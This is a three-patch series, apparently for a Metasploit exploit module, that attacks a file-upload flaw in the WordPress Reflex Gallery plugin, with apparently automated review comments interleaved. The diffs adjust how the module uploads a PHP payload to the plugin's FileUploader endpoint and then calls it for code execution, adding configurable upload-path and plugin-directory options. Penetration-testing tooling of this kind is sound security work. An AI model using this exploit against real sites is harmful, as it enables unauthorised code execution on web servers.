From 78710633e2e7018ae67826b3bd8f543ebf33e3d9 Mon Sep 17 00:00:00 2001
From: Kyle Bouchard
Date: Wed, 3 Dec 2025 15:46:07 -0500
Subject: [PATCH 1/3] Remove current date constraint from uploaded path
---
 .../unix/webapp/wp_reflexgallery_file_upload.rb | 10 +---------
 1 file changed, 1 insertion(+), 9 deletions(-)
diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
index 0b04332cbc455..cffac7bb0ce4f 100644
--- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
@@ -55,17 +55,9 @@ def exploit
 data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
 post_data = data.to_s
 
- time = Time.new
- year = time.year.to_s
- month = "%02d" % time.month
-
 res = send_request_cgi({
 'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
 'method' => 'POST',
- 'vars_get' => {
- 'Year' => "#{year}",
- 'Month' => "#{month}"
- },
 'ctype' => "multipart/form-data; boundary=#{data.bound}",
 'data' => post_data
 })
@@ -83,7 +75,7 @@ def exploit
 print_status("Calling payload...")
 
 send_request_cgi(
- 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename)
+ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_pagename)
 )
 end
 end
From 7b816cd439dec4d419ee8b45550187558330c7de Mon Sep 17 00:00:00 2001
From: Kyle Bouchard
Date: Thu, 4 Dec 2025 11:33:28 -0500
Subject: [PATCH 2/3] Add year and month options for file upload
---
 .../webapp/wp_reflexgallery_file_upload.rb | 19 ++++++++++++++++++-
 1 file changed, 18 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
index cffac7bb0ce4f..21bb18581aa19 100644
--- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
@@ -42,6 +42,14 @@ def initialize(info = {})
 }
 )
 )
+
+ time = Time.new
+ register_options(
+ [
+ OptString.new('UPLOAD_YEAR', [ false, 'Year to use in upload path', time.year.to_s]),
+ OptString.new('UPLOAD_MONTH', [ false, 'Month to use in upload path', "%02d" % time.month]),
+ ]
+ )
 end
 
 def check
@@ -55,9 +63,16 @@ def exploit
 data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
 post_data = data.to_s
+ year = datastore['upload_year']
+ month = datastore['upload_month']
+
 res = send_request_cgi({
 'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
 'method' => 'POST',
+ 'vars_get' => {
+ 'Year' => "#{year}",
+ 'Month' => "#{month}"
+ },
 'ctype' => "multipart/form-data; boundary=#{data.bound}",
 'data' => post_data
 })
@@ -66,6 +81,8 @@ def exploit
 if res.code == 200 && res.body =~ /success|#{php_pagename}/
 print_good("Our payload is at: #{php_pagename}. Calling payload...")
 register_files_for_cleanup(php_pagename)
+ elsif res.code == 200 && res.body.include?("does not exist")
+ fail_with(Failure::Unknown, "#{peer} - Upload directory /#{year}/#{month} does not exist. Try setting them to an existing upload folder or emptying the variables to upload to the root upload folder")
 else
 fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
 end
@@ -75,7 +92,7 @@ def exploit
 print_status("Calling payload...")
 
 send_request_cgi(
- 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_pagename)
+ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', year, month, php_pagename)
 )
 end
 end
From 30635cbaddc9aa3c97d50d8ef7d7d0461116284d Mon Sep 17 00:00:00 2001
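Review bot: The new `UPLOAD_YEAR` and `UPLOAD_MONTH` option descriptions in the `register_options` call do not say what format is expected or what an empty value means, even though the error message added in the third hunk of this patch tells the operator to empty them to fall back to the root upload folder. I would state both in the registration: `'Year to use in upload path (YYYY); leave empty to upload to the root upload folder'` and `'Month to use in upload path (MM); leave empty to upload to the root upload folder'`. The defaults are computed once when the module is instantiated, which is reasonable here, but a short comment above `time = Time.new` such as `# Defaults follow the current date; the upload path is uploads/<year>/<month>` would make the intent clear to the next reader. initialize's body starts outside the hunk.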
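Review bot: `year = datastore['upload_year']` and `month = datastore['upload_month']` read the options under lower-case keys while they are registered as `UPLOAD_YEAR` and `UPLOAD_MONTH`; the Metasploit datastore is case-insensitive as far as I recall, so this works, but it hides the link between registration and use and differs from the upper-case `datastore['PLUGIN_DIRECTORY_NAME']` read added in PATCH 3/3. Both options are optional, so either can be nil; the `"#{year}"` interpolation in `vars_get` turns that into an empty string, but the callback URI in the last hunk (`@@ -75,7 +92,7 @@`) passes `year` and `month` to `normalize_uri` unconverted, which is only safe if that helper tolerates nil — worth confirming. I would read them once with an explicit conversion, `year = datastore['UPLOAD_YEAR'].to_s` and `month = datastore['UPLOAD_MONTH'].to_s`, after which `'Year' => year` and `'Month' => month` replace the redundant interpolations. exploit's body starts and ends outside the hunk.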
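Review bot: The new `elsif` branch raises `Failure::Unknown` for a condition its own message attributes to the operator's `UPLOAD_YEAR`/`UPLOAD_MONTH` settings; `Failure::BadConfig` is the category that matches, `fail_with(Failure::BadConfig, ...)`, and leaves `Failure::Unknown` for the genuinely unexplained `else` case. The branch is only reached when the first condition is false, so a 200 body containing both `does not exist` and the uploaded filename would be reported as success; if the uploader can answer that way, the `does not exist` test should come first. The `res.code == 200` test is now repeated in two branches and could be hoisted into an outer `if`, but that is a style nit.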
From: ptrstr
Date: Wed, 10 Dec 2025 18:14:26 -0500
Subject: [PATCH 3/3] Make plugin URI configurable
---
 .../unix/webapp/wp_reflexgallery_file_upload.rb | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
index 21bb18581aa19..388bd1c05cf84 100644
--- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
@@ -48,10 +48,19 @@ def initialize(info = {})
 [
 OptString.new('UPLOAD_YEAR', [ false, 'Year to use in upload path', time.year.to_s]),
 OptString.new('UPLOAD_MONTH', [ false, 'Month to use in upload path', "%02d" % time.month]),
+ OptString.new('PLUGIN_DIRECTORY_NAME', [ true, 'Name of the directory that contains the reflex-gallery plugin', 'reflex-gallery']),
 ]
 )
 end
 
+ def plugin_dir
+ datastore['PLUGIN_DIRECTORY_NAME']
+ end
+
+ def plugin_uri
+ normalize_uri(wordpress_url_plugins, plugin_dir)
+ end
+
 def check
 check_plugin_version_from_readme('reflex-gallery', '3.1.4')
 end
@@ -67,7 +76,7 @@ def exploit
 month = datastore['upload_month']
 
 res = send_request_cgi({
- 'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
+ 'uri' => normalize_uri(plugin_uri, 'admin', 'scripts', 'FileUploader', 'php.php'),
 'method' => 'POST',
 'vars_get' => {
 'Year' => "#{year}",
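Review bot: `check` still passes the literal `'reflex-gallery'` to `check_plugin_version_from_readme` while the request URI in the second hunk is now built from the new `PLUGIN_DIRECTORY_NAME` option, so the two methods disagree as soon as the option is changed from its default and `check` can report a result for a path the module never uses. The check should go through the same accessor, `check_plugin_version_from_readme(plugin_dir, '3.1.4')`. `plugin_dir` reads the datastore with the upper-case key whereas the `upload_year`/`upload_month` reads in `exploit` use lower-case; pick one form for the file. A one-line YARD comment on `plugin_uri`, such as `# @return [String] base URI of the plugin under the WordPress plugins directory`, would help now that it is the base for the upload request URI.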